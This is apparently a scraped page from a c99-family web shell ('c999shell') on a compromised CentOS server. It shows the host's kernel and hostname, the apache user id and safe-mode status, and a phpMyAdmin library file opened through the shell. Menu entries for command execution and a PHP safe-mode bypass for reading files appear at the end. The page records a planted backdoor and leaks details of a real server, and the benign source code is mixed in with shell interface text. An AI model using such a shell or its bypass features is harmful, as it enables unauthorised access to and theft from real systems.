Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/phpMyAdmin/libraries/ drwxr-xr-x | |
| Viewing file: Select action/file-type: = 4.1.0, we should be able to detect if user has a CREATE // privilege by looking at SHOW GRANTS output; // for < 4.1.0, it could be more difficult because the logic tries to // detect the current host and it might be expressed in many ways; also // on a shared server, the user might be unable to define a controluser // that has the proper rights to the "mysql" db; // so we give up and assume that user has the right to create a table // // Note: in this case we could even skip the following "foreach" logic // Addendum, 2006-01-19: ok, I give up. We got some reports about servers // where the hostname field in mysql.user is not the same as the one // in mysql.db for a user. In this case, SHOW GRANTS does not return // the db-specific privileges. And probably, those users are on a shared // server, so can't set up a control user with rights to the "mysql" db. // We cannot reliably detect the db-specific privileges, so no more // warnings about the lack of privileges for CREATE TABLE. Tested // on MySQL 5.0.18. $is_create_table_priv = true; /* if (PMA_MYSQL_INT_VERSION >= 40100) { $is_create_table_priv = false; } else { $is_create_table_priv = true; } foreach ( $dbs_where_create_table_allowed as $allowed_db ) { // if we find the exact db name, we stop here if ($allowed_db == $db) { $is_create_table_priv = TRUE; break; } // '*' indicates a global CREATE priv if ($allowed_db == '*') { $is_create_table_priv = TRUE; break; } if (ereg('%|_', $allowed_db)) { // take care of wildcards and escaped wildcards, // transforming them into regexp patterns $max_position = strlen($allowed_db) - 1; $i = 0; $pattern = ''; while ($i <= $max_position) { if ($allowed_db[$i] == '\\'){ if ($i < $max_position - 1 && $allowed_db[$i+1] == '_'){ $chunk = '_'; $i++; } elseif ($i < $max_position - 1 && $allowed_db[$i+1] == '%'){ $chunk = '%'; $i++; } else { $chunk = $allowed_db[$i]; } } elseif ($allowed_db[$i] == '_'){ $chunk = '.'; } elseif ($allowed_db[$i] == '%'){ $chunk = '(.)*'; } else { $chunk = $allowed_db[$i]; } $pattern .= $chunk; $i++; } // end while unset($i, $max_position, $chunk); $matches = ''; if (preg_match('@' .$pattern . '@i', $db, $matches)) { if ($matches[0] == $db) { $is_create_table_priv = TRUE; break; //TODO: maybe receive in $allowed_db also the db names // on which we cannot CREATE, and check them // in this foreach, because if a user is allowed to CREATE // on db foo% but forbidden on db foobar, he should not // see the Create table dialog } } } } // end foreach unset($i, $max_position, $chunk, $pattern); */ ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]-- |